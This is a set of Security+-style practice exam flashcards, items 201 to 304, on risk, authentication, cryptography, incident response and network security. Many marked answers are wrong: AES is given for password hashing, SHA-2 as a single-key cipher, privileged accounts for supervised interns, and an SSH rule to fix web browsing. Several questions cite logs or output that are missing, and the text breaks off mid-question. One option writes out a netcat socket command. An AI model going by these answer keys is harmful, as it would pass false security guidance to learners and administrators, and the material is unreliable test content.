Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?

Service level agreement
Memorandum of understanding
Business partner agreement
Interoperability agreement

A

SLA

201
Q

A security analyst monitors the syslog server and notices the following:

Memory leak
Buffer overflow
Null pointer deference
Integer overflow

A

Buffer overflow

202
Q

A security analyst is reviewing an assessment report that includes software versions, running services,
supported encryption algorithms, and permission settings. Which of the following produced the report?

Vulnerability scanner
Protocol analyzer
Network mapper
Web inspector

A

Vulnerability scanner

203
Q

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

Vulnerability scanner
Network-based IDS
Rogue system detection
Configuration compliance scanner

A

Rogue system detection

204
Q

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a
known vulnerability. Which of the following risk responses does this BEST describe?

Transference
Avoidance
Mitigation
Acceptance

A

Acceptance

205
Q

A systems administrator wants to generate a self-signed certificate for an internal website. Which of the
following steps should the systems administrator complete prior to installing the certificate on the server?

Provide the private key to a public CA.
Provide the public key to the internal CA.
Provide the public key to a public CA.
Provide the private key to the internal CA.
Provide the public/private key pair to the internal CA
Provide the public/private key pair to a public CA.

A

Provide the private key to the internal CA

206
Q

A systems administrator has been assigned to create accounts for summer interns. The interns are only
authorized to be in the facility and operate computers under close supervision. They must also leave the
facility at designated times each day. However, the interns can access intern file folders without supervision.

Which of the following represents the BEST way to configure the accounts? (Select TWO.)

Implement time-of-day restrictions.
Modify archived data.
Access executive shared portals.
Create privileged accounts.
Enforce least privilege.
A

Implement time of day restrictions

and

Create privileged accounts

207
Q

During a recent audit, several undocumented and unpatched devices were discovered on the internal network.
Which of the following can be done to prevent similar occurrences?

Run weekly vulnerability scans and remediate any missing patches on all company devices

Implement rogue system detection and configure automated alerts for new devices

Install DLP controls and prevent the use of USB drives on devices

Configure the WAPs to use NAC and refuse connections that do not pass the health check

A

Run weekly vulnerability scans and remediate any missing patches on all company devices

208
Q

A penetration tester is conducting an assessment on Comptia.org and runs the following command from a
coffee shop while connected to the public Internet:

c:\nslookup - querytype=MX comptia.org
Server: Unknown
Address: 198.51.100.45
comptia.org MX preference=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail
exchanger = exchg1.comptia.org exchg1.comptia.org internet address = 192.168.102.67

Which of the following should the penetration tester conclude about the command output?

The public/private views on the Comptia.org DNS servers are misconfigured.
Comptia.org is running an older mail server, which may be vulnerable to exploits.
The DNS SPF records have not been updated for Comptia.org.
192.168.102.67 is a backup mail server that may be more vulnerable to attack.

A

192.168.102.67 is a backup mail server that may be more vulnerable to attack.

209
Q

A security administrator is choosing an algorithm to generate password hashes.

Which of the following would offer the BEST protection against offline brute force attacks?

MD5
3DES
AES
SHA-1

A

AES

210
Q

Which of the following BEST explains why sandboxing is a best practice for testing software from an
untrusted vendor prior to an enterprise deployment?

It allows the software to run in an unconstrained environment with full network access.
It eliminates the possibility of privilege escalation attacks against the local VM host.
It facilitates the analysis of possible malware by allowing it to run until resources are exhausted.
It restricts the access of the software to a contained logical space and limits possible damage.

A

It restricts the access of the software to a contained logical space and limits possible damage.

211
Q

When accessing a popular website, a user receives a warming that the certificate for the website is not valid.
Upon investigation, it was noted that the certificate is not revoked and the website is working fine for other
users.

Which of the following is the MOST likely cause for this?

The certificate is corrupted on the server.
The certificate was deleted from the local cache.
The user needs to restart the machine.
The system date on the user’s device is out of sync.

A

The system date on the user’s device is out of sync.

212
Q

A security administrator has completed a monthly review of DNS server query logs. The administrator notices continuous name resolution attempts from a large number of internal hosts to a single Internet addressable domain name. The security administrator then correlated those logs with the establishment of persistent TCP connections out to this domain. The connections seem to be carrying on the order of kilobytes of data per week.

Which of the following is the MOST likely explanation for this company?

An attacker is infiltrating large amounts of proprietary company data.
Employees are playing multiplayer computer games.
A worm is attempting to spread to other hosts via SMB exploits.
Internal hosts have become members of a botnet.

A

Internal hosts have become members of a botnet.

213
Q

An application was recently compromised after some malformed data came in via web form. Which of the
following would MOST likely have prevented this?

Input validation
Proxy server
Stress testing
Encoding

A

Input validation

214
Q

A security analyst is securing smartphones and laptops for a highly mobile workforce.
Priorities include:

Remote wipe capabilities
Geolocation services
Patch management and reporting
Mandatory screen locks
Ability to require passcodes and pins
Ability to require encryption

Which of the following would BEST meet these requirements?

Implementing MDM software
Deploying relevant group policies to the devices
Installing full device encryption
Removing administrative rights to the devices

A

Implementing MDM software

215
Q

A small organization has implemented a rogue system detection solution. Which of the following BEST
explains the organization’s intent?

To identify weak ciphers being used on the network
To identify assets on the network that are subject to resource exhaustion
To identify end-of-life systems still in use on the network
To identify assets that are not authorized for use on the network

A

To identify assets that are not authorized for use on the network

216
Q

Joe, a contractor, is hired by a firm to perform a penetration test against the firm’s infrastructure. When
conducting the scan, he receives only the network diagram and the network list to scan against the network.

Which of the following scan types is Joe performing?

Authenticated
White box
Automated
Gray box

A

Gray box

217
Q

Which of the following is the proper order for logging a user into a system from the first step to the last step?

Identification, authentication, authorization
Identification, authorization, authentication
Authentication, identification, authorization
Authentication, identification, authorization
Authorization, identification, authentication

A

Identification, authentication, authorization

218
Q

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for
analysis. The analyst notices that an internal host had a socket established with another internal host over a
non-standard port.

Upon investigation, the origin host that initiated the socket shows this output:

Given the above output, which of the following commands would have established the questionable socket?

traceroute 8.8.8.8
ping -1 30 8.8.8.8 -a 600
nc -1 192.168.5.1 -p 9856
pskill pid 9487

A

nc -1 192.168.5.1 -p 9856

219
Q

A security analyst is attempting to break into a client’s secure network. The analyst was not given prior
information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst’s NEXT step is to perform:

a risk analysis.
a vulnerability assessment.
a gray-box penetration test.
an external security audit.
a red team exercise.
A

a gray-box penetration test

220
Q

When used together, which of the following qualify as two-factor authentication?

Password and PIN
Smart card and PIN
Proximity card and smart card
Fingerprint scanner and iris scanner

A

Smart card and PIN

221
Q

A small- to medium-sized company wants to block the use of USB devices on its network. Which of the
following is the MOST cost-effective way for the security analyst to prevent this?

Implement a DLP system
Apply a GPO
Conduct user awareness training
Enforce the AUP.

A

Apply a GPO

222
Q

Which of the following differentiates ARP poisoning from a MAC spoofing attack?

ARP poisoning uses unsolicited ARP replies.
ARP poisoning overflows a switch’s CAM table.
MAC spoofing uses DHCPOFFER/DHCPACK packets.
MAC spoofing can be performed across multiple routers.

A

ARP poisoning uses unsolicited ARP replies

223
Q

Joe, an employee, asks a coworker how long ago Ann started working at the help desk. The coworker
expresses surprise since nobody named Ann works at the help desk. Joe mentions that Ann called several
people in the customer service department to help reset their passwords over the phone due to unspecified
“server issues”.

Which of the following has occurred?

Social engineering
Whaling
Watering hole attack
Password cracking

A

Social engineering

224
Q

A company wants to provide centralized authentication for its wireless system. The wireless authentication
system must integrate with the directory back end. Which of the following is a AAA solution that will provide the required wireless authentication?

TACACS+
MSCHAPv2
RADIUS
LDAP

A

RADIUS

225
Q

Corporations choose to exceed regulatory framework standards because of which of the following incentives?

It improves the legal defensibility of the company.
It gives a social defense that the company is not violating customer privacy laws.
It proves to investors that the company takes APT cyber actors seriously
It results in overall industrial security standards being raised voluntarily.

A

It improves the legal defensibility of the company

226
Q

A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts?

Employ time-of-day restrictions.
Employ password complexity.
Employ a random key generator strategy.
Employ an account expiration strategy.
Employ a password lockout policy
A

Employ an account expiration strategy

227
Q

A staff member contacts the help desk because the staff member’s device is currently experiencing the
following symptoms:

Long delays when launching applications
Timeout errors when loading some websites
Errors when attempting to open local Word documents and photo files
Pop-up messages in the task bar stating that antivirus is out-of-date
VPN connection that keeps timing out, causing the device to lose connectivity

Which of the following BEST describes the root cause of these symptoms?

The user has disabled the antivirus software on the device, and the hostchecker for the VPN is
preventing access.
The device is infected with crypto-malware, and the files on the device are being encrypted.
The proxy server for accessing websites has a rootkit installed, and this is causing connectivity issues.
A patch has been incorrectly applied to the device and is causing issues with the wireless adapter on the
device.

A

The device is infected with crypto-malware, and the files on the device are being encrypted

228
Q

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which
of the following might be identified by the scanner? (Select TWO).

The firewall is disabled on workstations.
SSH is enabled on servers.
Browser homepages have not been customized.
Default administrator credentials exist on networking hardware.
The OS is only set to check for updates once a day.

A

The firewall is disabled on workstations

and

SSH is enabled on servers

229
Q

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?

Passive scan
Aggressive scan
Credentialed scan
Intrusive scan

A

Passive scan

230
Q

A company is implementing a tool to mask all PII when moving data from a production server to a testing
server. Which of the following security techniques is the company applying?

Data wiping
Steganograpgy
Data obfuscation
Data sanitization

A

Data sanitization

231
Q

A technician receives a device with the following anomalies:

Frequent pop-up ads
Show response-time switching between active programs Unresponsive peripherals
The technician reviews the following log file entries:
File Name Source MD5 Target MD5
Status
antivirus.exe F794F21CD33E4F57890DDEA5CF267ED2 F794F21CD33E4F57890DDEA5CF267ED2
Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEA
AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe
77FF390CD33E4F57890DDEA5CF28881F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe
E289F21CD33E4F57890DDEA5CF28EDC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped

Based on the above output, which of the following should be reviewed?

The web application firewall
The file integrity check
The data execution prevention
The removable media control

A

The file integrity check

232
Q

An organization requires employees to insert their identification cards into a reader so chips embedded in the cards can be read to verify their identities prior to accessing computing resources. Which of the following
BEST describes this authentication control?

TPM
Token
Proximity card
CAC

A

Proximity card

233
Q

An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the
following portions of the policy would the security officer need to consult to determine if a breach has
occurred?

Public
Private
PHI
PII

A

PII

234
Q

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which
of the following types of scans MOST likely caused the outage?

Non-intrusive credentialed scan
Non-intrusive non-credentialed scan
Intrusive credentialed scan
Intrusive non-credentialed scan

A

Intrusive non-credentialed scan

235
Q

When attackers use a compromised host as a platform for launching attacks deeper into a company’s network,
it is said that they are:

escalating privilege
becoming persistent
fingerprinting
pivoting

A

Pivoting

236
Q

A security analyst is checking log files and finds the following entries:

Which of the following is MOST likely happening?

A hacker attempted to pivot using the web server interface.
A potential hacker could be banner grabbing to determine what architecture is being used.
The DNS is misconfigured for the server’s IP address.
A server is experiencing a DoS, and the request is timing out,

A

A hacker attempted to pivot using the web server interface.

237
Q

A user needs to transmit confidential information to a third party.
Which of the following should be used to encrypt the message?

AES
SHA-2
SSL
RSA

A

AES

238
Q

The Chief Executive Officer (CEO) received an email from the Chief Financial Officer (CFO), asking the
CEO to send financial details. The CEO thought it was strange that the CFO would ask for the financial details
via email. The email address was correct in the “From” section of the email. The CEO clicked the form and
sent the financial information as requested. Which of the following caused the incident?

Domain hijacking
SPF not enabled
MX records rerouted
Malicious insider

A

SPF not enabled

239
Q

A security administrator is implementing a new WAF solution and has placed some of the web servers behind the WAF, with the WAF set to audit mode. When reviewing the audit logs of external requests and posts to the web servers, the administrator finds the following entry:

Based on this data, which of the following actions should the administrator take?
Alert the web server administrators to a misconfiguration.
Create a blocking policy based on the parameter values.
Change the parameter name ‘Account_Name’ identified in the log.
Create an alert to generate emails for abnormally high activity.

A

Create an alert to generate emails for abnormally high activity.

240
Q

Every morning, a systems administrator monitors failed login attempts on the company’s log management
server. The administrator notices the DBAdmin account has five failed username and/or password alerts
during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?

Role-based access control
Honeypot
Rule-based access control
Password cracker

A

Honeypot

241
Q

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original mediA. Joe is about to begin copying the user’s files back onto the hard drive. Which of the following incident response steps is Joe working on now?

Recovery
Eradication
Containment
Identification

A

Recovery

242
Q

A company has a team of penetration testers. This team has located a file on the company file server that they believe contains cleartext usernames followed by a hash. Which of the following tools should the penetration testers use to learn more about the content of this file?

Exploitation framework
Vulnerability scanner
Netcat
Password cracker

A

Password cracker

243
Q

A Chief Information Security Officer (CISO) has tasked a security analyst with assessing the security posture
of an organization and which internal factors would contribute to a security compromise. The analyst performs a walk-through of the organization and discovers there are multiple instances of unlabeled optical media on office desks. Employees in the vicinity either do not claim ownership or disavow any knowledge concerning who owns the media. Which of the following is the MOST immediate action to be taken?

Confiscate the media and dispose of it in a secure manner as per company policy.

Confiscate the media, insert it into a compter, find out what is on the disc, and then label it and return it
to where it was found.

Confiscate the media and wait for the owner to clain it. If it is not claimed within one month, shred it.

Confiscate the media, insert it into a computer, make a copy of the disc, and then return the original to
where it was found.

A

Confiscate the media and dispose of it in a secure manner as per company policy

244
Q

An organization uses application whitelisting to help prevent zero-day attacks. Malware was recently
identified on one client, which was able to run despite the organization’s application whitelisting approach.
The forensics team has identified the malicious file, conducted a post-incident analysis, and compared this with the original system baseline. The team sees the following output:

filename hash (SHA-1)

original: winSCP.exe 2d da b1 4a 98 fc f1 98 06 b1 e5 26 b2 df e5 f5 3e cb 83 el
latest: winSCP.exe a3 4a c2 4b 85 fa f2 dd 0b ba f4 16 b2 df f2 4b 3f ac 4a e1

Which of the following identifies the flaw in the team’s application whitelisting approach?

Their approach uses executable names and not hashes for the whitelist.
SHA-1 has known collision vulnerabilities and should not be used.
The original baseline never captured the latest file signature
Zero-day attacks require the latest file signatures

A

Their approach uses executable names and not hashes for the whitelist.

245
Q

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

Infrastructure
Platform
Software
Virtualization

A

Infrastructure

246
Q

A systems administrator is configuring a system that uses data classification labels.
Which of the following will the administrator need to implement to enforce access control?

Discretionary access control
Mandatory access control
Role-based access control
Rule-based access control

A

Mandatory access control

247
Q

Which of the following describes the key difference between vishing and phishing attacks?

Phishing is used by attackers to steal a person’s identity.
Vishing attacks require some knowledge of the target of attack.
Vishing attacks are accomplished using telephony services.
Phishing is a category of social engineering attack.

A

Vishing attacks are accomplished using telephony services

248
Q

Ann is the IS manager for several new systems in which the classification of the systems’ data are being
decided. She is trying to determine the sensitivity level of the data being processed. Which of the following
people should she consult to determine the data classification?

Steward
Custodian
User
Owner

A

Owner

249
Q

After a recent internal breach, a company decided to regenerate and reissue all certificates used in the
transmission of confidential information. The company places the greatest importance on confidentiality and
non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST
describes how the company will use these certificates?

One key pair will be used for encryption and decryption. The other will be used to digitally sign the
data.
One key pair will be used for encryption. The other key pair will provide extended validation.
Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength.
One key pair will be used for internal communication, and the other will be used for external
communication.

A

One key pair will be used for encryption and decryption. The other will be used to digitally sign the data

250
Q

Which of the following identity access methods creates a cookie on the first login to a central authority to
allow logins to subsequent applications without re-entering credentials?

Multifactor authentication
Transitive trust
Federated access
Single sign-on

A

Single sign-on

251
Q

Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical
servers. Which of the following is the BEST method for Joe to use?

Differential
Incremental
Full
Snapshots

A

Full

252
Q

Which of the following is the BEST reason to run an untested application is a sandbox?

To allow the application to take full advantage of the host system’s resources and storage
To utilize the host systems antivirus and firewall applications instead of running it own protection
To prevent the application from acquiring escalated privileges and accessing its host system
To increase application processing speed so the host system can perform real-time logging

A

To prevent the application from acquiring escalated privileges and accessing its host system.

253
Q

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs.
Which of the following changes should the company make to reduce the risks associated with phishing
attacks? (Select TWO)

Install an additional firewall
Implement a redundant email server
Block access to personal email on corporate systems
Update the X.509 certificates on the corporate email server
Update corporate policy to prohibit access to social media websites
Review access violation on the file server

A

Block access to personal email on corporate systems

and

Update corporate policy to prohibit access to social media websites

254
Q

A company wants to ensure users are only logging into the system from their laptops when they are on site.
Which of the following would assist with this?

Geofencing
Smart cards
Biometrics
Tokens

A

Geofencing

255
Q

An audit found that an organization needs to implement job rotation to be compliant with regulatory
requirements. To prevent unauthorized access to systems after an individual changes roles or departments, which of the following should the organization implement?

Permission auditing and review
Exit interviews
Offboarding
Multifactor authentication

A

Permission auditing and review

256
Q

A company is performing an analysis of which corporate units are most likely to cause revenue loss in the event the unit is unable to operate. Which of the following is an element of the BIA that this action is
addressing?

Critical system inventory
Single point of failure
Continuity of operations
Mission-essential functions

A

Critical system inventory

257
Q

A security technician has been assigned data destruction duties. The hard drives that are being disposed of contain highly sensitive information. Which of the following data destruction techniques is MOST
appropriate?

Degaussing
Purging
Wiping
Shredding

A

Degaussing

258
Q

A security analyst receives a notification from the IDS after working hours, indicating a spike in network
traffic. Which of the following BEST describes this type of IDS?

Anomaly-based
Stateful
Host-based
Signature-based

A

Anomaly-based

259
Q

A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites?

Extended domain validation
TLS host certificate
OCSP stapling
Wildcard certificate

A

TLS host certificate

260
Q

After the integrity of a patch has been verified, but before being deployed to production, it is important to:

perform static analysis
reverse engineer it for embedded malware.
run dynamic analysis on the executable.
test it in a staging environment

A

test it in a staging environment

261
Q

An organization electronically processes sensitive data within a controlled facility. The Chief Information
Security Officer (CISO) wants to limit emissions from emanating from the facility. Which of the following
mitigates this risk?

Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of emission
spillage
Hardening the facility through the use of secure cabinetry to block emissions
Hardening the facility with a Faraday cage to contain emissions produced from data processing
Employing security guards to ensure unauthorized personnel remain outside of the facility

A

Hardening the facility with a Faraday cage to contain emissions produced from data processing.

262
Q

Which of the following methods minimizes the system interaction when gathering information to conduct a
vulnerability assessment of a router?

Download the configuration
Run a credentialed scan.
Conduct the assessment during downtime
Change the routing to bypass the router.

A

Download the configuration

263
Q

Given the following requirements:
Help to ensure non-repudiation
Capture motion in various formats
Which of the following physical controls BEST matches the above descriptions?

Camera
Mantrap
Security guard
Motion sensor

A

camera

264
Q

An organization wants to deliver streaming audio and video from its home office to remote locations all over
the world. It wants the stream to be delivered securely and protected from intercept and replay attacks. Which
of the following protocols is BEST suited for this purpose?

SSH
SIP
S/MIME
SRTP

A

SRTP

265
Q

A Chief Information Security Officer (CISO) has instructed the information assurance staff to act upon a fast-spreading virus. Which of the following steps in the incident response process should be taken NEXT?

Identification
Eradication
Escalation
Containment

A

Identification

266
Q

Which of the following access management concepts is MOST closely associated with the use of a password
or PIN??

Authorization
Authentication
Accounting
Identification

A

Authentication

267
Q

A security analyst is hardening a WiFi infrastructure.
The primary requirements are the following:

The infrastructure must allow staff to authenticate using the most secure method.
The infrastructure must allow guests to use an “open” WiFi network that logs valid email addresses
before granting access to the Internet.

Given these requirements, which of the following statements BEST represents what the analyst should
recommend and configure?

Configure a captive portal for guests and WPS for staff.
Configure a captive portal for staff and WPA for guests.
Configure a captive portal for staff and WEP for guests.
Configure a captive portal for guest and WPA2 Enterprise for staff

A

Configure a captive portal for guest and WPA2 Enterprise for staff

268
Q

A manager makes an unannounced visit to the marketing department and performs a walk-through of the office. The manager observes unclaimed documents on printers. A closer look at these documents reveals employee names, addresses, ages, birth dates, marital/dependent statuses, and favorite ice cream flavors. The manager brings this to the attention of the marketing department head. The manager believes this information to be PII, but the marketing head does not agree. Having reached a stalemate, which of the following is the MOST appropriate action to take NEXT?

Elevate to the Chief Executive Officer (CEO) for redress; change from the top down usually succeeds.
Find the privacy officer in the organization and let the officer act as the arbiter.
Notify employees whose names are on these files that their personal information is being compromised.
To maintain a working relationship with marketing, quietly record the incident in the risk register.

A

Find the privacy officer in the organization and let the officer act as the arbiter.

269
Q

If two employees are encrypting traffic between them using a single encryption key, which of the following
agorithms are they using?

RSA
3DES
DSA
SHA-2

A

SHA-2

270
Q

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main
culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left
unresolved? (Select TWO)

MITM attack
DoS attack
DLL injection
Buffer overflow
Resource exhaustion
A

DoS attack

and

Resource exhaustion

271
Q

A security analyst is performing a BIA. The analyst notes that In a disaster, failover systems must be up and running within 30 minutes. The failover systems must use backup data that Is no older than one hour Which of the following should the analyst include In the business continuity plan?

A maximum MTTR of 30 minutes
A maximum MTBF of 30 minutes
A maximum RTO of 60 minutes
A maximum RPO of 60 minutes
An SLA guarantee of 60 minutes
A

An SLA guarantee of 60 minutes

272
Q

A water utility company has seen a dramatic increase in the number of water pumps burning out. A malicious
actor was attacking the company and is responsible for the increase. Which of the following systems has the
attacker compromised?

DMZ
RTOS
SCADA
IoT

A

SCADA

273
Q

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The
CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality.
Which of the following equipment MUST be deployed to guard against unknown threats?

Cloud-based antivirus solution, running as local admin, with push technology for definition updates
Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all
client computing needs
Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter
firewall ACLs
Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

A

Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

274
Q

A developer has incorporated routines into the source code for controlling the length of the input passed to the program. Which of the following types of vulnerabilities is the developer protecting the code against?

DLL injection
Memory leak
Buffer overflow
Pointer dereference

A

Buffer overflow

275
Q

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN, and the sends
confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon
investigation, the company learns Joe’s emails were intercepted. Which of the following MOST likely caused
the data breach?

Policy violation
Social engineering
Insider threat
Zero-day attack

A

Policy violation

276
Q

Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request?

Retinal scan
Passphrase
Token fob
Security question

A

Token fob

277
Q

A network administrator is trying to provide the most resilient hard drive configuration in a server. With five
hard drives which of the following is the MOST fault-tolerant configuration?

RAID 1
RAID 5
RAID 6
RAID 10

A

RAID 6

278
Q

An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take?

Flip the documents face down so no one knows these documents are PII sensitive
Shred the documents and let the owner print the new set
Retrieve the documents, label them with a PII cover sheet, and return them to the printer
Report to the human resources manager that their personnel are violating a privacy policy

A

Report to the HR manager that their personnel are violating a privacy policy

279
Q

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?

Hot site
Warm site
Cold site
Cloud-based site

A

Cloud-based site

280
Q

A systems administrator is installing a new server in a large datacenter. Which of the following BEST
describes the importance of properly positioning servers in the rack to maintain availability?

To allow for visibility of the servers’ status indicators
To adhere to cable management standards
To maximize the fire suppression system’s efficiency
To provide consistent air flow

A

To provide consistent air flow

281
Q

In a lessons learned report, it is suspected that a well-organized, well-funded, and extremely sophisticated
group of attackers may have been responsible for a breach at a nuclear facility.
Which of the following describes the type of actors that may have been implicated?

Nation state
Hacktivist
Insider
Competitor

A

Nation state

282
Q

An employee in the finance department receives an email, which appears to come from the Chief Financial
Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the
following BEST describes the principles of social engineering used? (Choose two.)

Familiarity
Scarcity
Urgency
Authority
Consensus
A

Urgency

and

Authority

283
Q

Joe recently assumed the role of data custodian for this organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled “unclassified” and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives?

Burning
Wiping
Purging
Pulverizing

A

Pulverizing

284
Q

An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 204.211.38.52/24 after a firewall upgrade. The active firewall rules are as follows:

Assuming port numbers have not been changed from their defaults, which of the following should be modified to allow printing to the network printer?

The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP
The deny statement for 204.211.38.52/24 should be changed to a permit statement
The permit statement for 204.211.38.52/24 should be changed to UDP port 443 instead of 631
The permit statement for 204.211.38.211/24 should be changed to TCP port 631 only instead of ALL

A

The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP

285
Q

After attempting to harden a web server, a security analyst needs to determine if an application remains
vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this
determination?

tracert
Fuzzer
nslookup
Nmap
netcat
A

Fuzzer

286
Q

A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior.
Which of the following strategies is the security engineer executing?

Baselining
Mandatory access control
Control diversity
System hardening

A

Control diversity

287
Q

An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement?

Tunnel mode
Transport mode
AH-only mode
ESP-only mode

A

Tunnel mode

288
Q

An organization is providing employees on the shop floor with computers that will log their time based on
when they sign on and off the network.
Which of the following account types should the employees receive?

Shared account
Privileged account
User account
Service account

A

User account

289
Q

Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not
received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?

Unencrypted credentials
Authentication issues
Weak cipher suite
Permission issues

A

Authentication issues

290
Q

A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites:
Which of the following is the MOST secure solution the security administrator can implement to fix this
issue?

Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53
Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22
Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY
Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY

A

Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22

291
Q

Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of
Company.com. Which of the following options should Company.com implement to mitigate these attacks?

Captive portal
OCSP stapling
Object identifiers
Key escrow
Extended validation certificate
A

OCSP stapling

292
Q

A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using
an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the
company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented?

Host-based firewall
Enterprise patch management system
Network-based intrusion prevention system
Application blacklisting
File integrity checking
A

Network-based intrusion prevention system

293
Q

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the
following BEST describes the resulting effect?

The server will be unable to server clients due to lack of bandwidth
The server’s firewall will be unable to effectively filter traffic due to the amount of data transmitted
The server will crash when trying to reassemble all the fragmented packets
The server will exhaust its memory maintaining half-open connections

A

The server will exhaust its memory maintaining half-open connections

294
Q

An organization wants to implement a solution that allows for automated logical controls for network defense. An engineer plans to select an appropriate network security component, which automates response actions based on security threats to the network. Which of the following would be MOST appropriate based on the engineer’s requirements?

NIPS
HIDS
Web proxy
Elastic load balancer
NAC
A

NIPS

295
Q

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabled baby monitor while the baby’s parents were sleeping.
Which of the following BEST describes how the intruder accessed the monitor?

Outdated antivirus
WiFi signal strength
Social engineering
Default configuration

A

Default configuration

296
Q

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident?

Volatile memory capture
Traffic and logs
Screenshots
System image capture

A

Traffic and logs

297
Q

A systems administrator has created network file shares for each department with associated security groups for each role within the organization.
Which of the following security concepts is the systems administrator implementing?

Separation of duties
Permission auditing
Least privilege
Standard naming conversation

A

Least privilege

298
Q

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the
domain controller, the systems administrator needs to provide the domain administrator credentials. Which of
the following account types is the systems administrator using?

Local account
Guest account
Service account
User account

A

Service account

299
Q

Which of the following development models entails several iterative and incremental software development
methodologies such as Scrum?

Spiral
Waterfall
Agile
Rapid

A

Agile

300
Q

Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?

Competitors
Insiders
Hacktivists
Script kiddies

A

Insiders

301
Q

Confidential corporate data was recently stolen by an attacker who exploited data transport protections.
Which of the following vulnerabilities is the MOST likely cause of this data breach?

Resource exhaustion on VPN concentrators
Weak SSL cipher strength
Improper input handling on FTP site
Race condition on packet inspection firewall

A

Improper input handling on FTP site

302
Q

A company has just completed a vulnerability scan of its servers. A legacy application that monitors the
HVAC system in the datacenter presents several challenges, as the application vendor is no longer in business.
Which of the following secure network architecture concepts would BEST protect the other company servers if the legacy server were to be exploited?

Virtualization
Air gap
VLAN
Extranet

A

Air gap

303
Q

Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization’s incident response capabilities. Which of the following activities has the incident team lead executed?

Lessons learned review
Root cause analysis
Incident audit
Corrective action exercise

A

Lessons learned review

304
Q

A user receives an email from ISP indicating malicious traffic coming from the user’s home network is
detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the
news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system.
Which of the following BEST describes what is happening?

